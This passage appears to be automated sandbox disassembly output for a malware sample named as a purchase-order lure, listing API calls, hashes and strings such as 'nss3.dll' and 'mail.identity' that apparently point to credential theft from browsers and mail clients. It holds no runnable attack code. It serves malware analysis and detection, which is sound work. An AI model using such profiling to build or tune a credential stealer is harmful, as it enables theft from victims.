                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D2C2
                                                              • memset.MSVCRT ref: 0040D2D8
                                                              • memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • memset.MSVCRT ref: 0040D319
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              APIs
                                                              Strings
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 3503910906-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT(?,00000000,?,75570A60,?,00000000), ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                              • _gmtime64.MSVCRT ref: 00411437
                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                              • strftime.MSVCRT ref: 00411476
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                              • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                              • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              APIs
                                                              • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              APIs
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                              • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: LongWindow
                                                              • String ID: MZ@
                                                              • API String ID: 1378638983-2978689999
                                                              • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                              • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                                                              • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                                                              • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              APIs
                                                              • strlen.MSVCRT ref: 0040849A
                                                              • memset.MSVCRT ref: 004084D2
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,7568EB20,?,00000000), ref: 0040858F
                                                              • LocalFree.KERNEL32(00000000,?,?,?,?,7568EB20,?,00000000), ref: 004085BA
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                              • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                              • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8